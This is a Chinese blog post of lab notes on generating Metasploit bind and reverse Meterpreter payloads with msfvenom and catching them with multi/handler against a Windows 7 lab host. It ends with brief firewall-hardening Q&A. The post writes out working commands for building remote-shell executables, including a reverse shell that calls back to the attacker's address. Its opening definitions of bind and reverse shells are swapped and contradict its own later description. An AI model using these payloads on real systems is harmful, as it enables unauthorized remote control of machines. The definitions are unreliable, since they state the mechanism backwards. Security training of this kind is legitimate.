实战笔记:从MSF载荷生成到Windows防火墙绕过

lee Lv2

正向shell与反向shell的本质区别:

bind_tcp是靶机主动连接攻击机的ip与端口,建立shell连接

reverse_tcp则是靶机等待攻击者连接(但第一步是靶机主动发起连接,然后等待)

其中前者易受防火墙的影响

ps:shell就像一个攻击机遥控受害机的遥控器

这里我们的攻击机是kali——192.168.145.128,目标机是win7——192.168.145.160

msf

工具作用

Msfvenom:生成恶意程序

Exploit模块:利用漏洞执行

Multi/Handler:接收连接

数据库模块:扫描结果

正向连接演示:

kali:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe -o b_op.exe

所以:b_op.exe运行后,目标机(win7)的5555端口开启监听

复制到win7去

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.145.160
set LPORT 5555

run!win7打开恶意文件之后回显成功

反向连接演示

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.145.128 LPORT=9999 -f exe -o r_op.exe

其余类比bindshell

防火墙加固

win7

进入任务管理器把刚才的b_op.exe和r_op.exe结束进程

不再有端口被监听

在真实的渗透测试中,什么场景下更适合使用反向 shel1?什么场景下更适合使用正向 shel1?

·如果是初次渗透:​能出内网​默认用反向,因为防火墙对出栈检测比较弱,内网隔离环境用正向
·如果有持久化的后门,优先用反向

仅通过配置出站规则,能否有效防御所有反向连接?为什么?

·不能,攻击者可能采用端口欺骗(比如用80,443端口等),协议伪装(比如看起来像DNS域名查询或浏览网页)

除了基于端口的防火墙规则,还有哪些更高级的加固手段可以防御此类攻击?

·使用白名单——只允许特定程序访问,其他一律组织

  • Title: 实战笔记:从MSF载荷生成到Windows防火墙绕过
  • Author: lee
  • Created at : 2025-10-28 09:31:57
  • Updated at : 2025-10-29 08:43:55
  • Link: https://leei.site/2025/10/28/实战笔记:从MSF载荷生成到Windows防火墙绕过/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments